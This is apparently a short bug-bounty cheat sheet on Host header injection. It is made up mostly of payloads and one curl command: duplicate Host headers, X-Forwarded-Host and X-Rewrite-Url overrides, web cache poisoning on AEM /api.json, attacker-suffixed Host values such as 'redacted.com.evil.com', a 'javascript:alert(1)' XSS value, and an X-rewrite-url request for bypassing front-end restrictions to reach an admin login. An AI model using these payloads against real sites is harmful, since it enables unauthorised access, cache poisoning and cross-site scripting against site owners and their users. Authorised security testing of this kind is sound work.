Comment on page
Host-Header
https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small
- 1.Add two
HOST:
in Request. - 2.Try this HeadersX-Original-Url:X-Forwarded-Server:X-Host:X-Forwarded-**Host**:X-Rewrite-Url:
- 3.If you come across
/api.json
in any AEM instance during bug hunting, try for web cache poisoning via followingHost: , X-Forwarded-Server , X-Forwarded-Host:
and or simply try https://localhost/api.json HTTP/1.1 - 4.Also try
Host: redacted.com.evil.com
- 5.
- 6.Try this too
Host: example.com?.mavenlink.com
- 7.Try
Host: javascript:alert(1);
Xss payload might result in debugging mode. https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html - 9.Bypass front server restrictions and access to forbidden files and directories through
X-Rewrite-Url/X-original-url:
curl -i -s -k -X 'GET' -H 'Host: <site>' -H 'X-rewrite-url: admin/login' 'https://<site>/'.
Last modified 2yr ago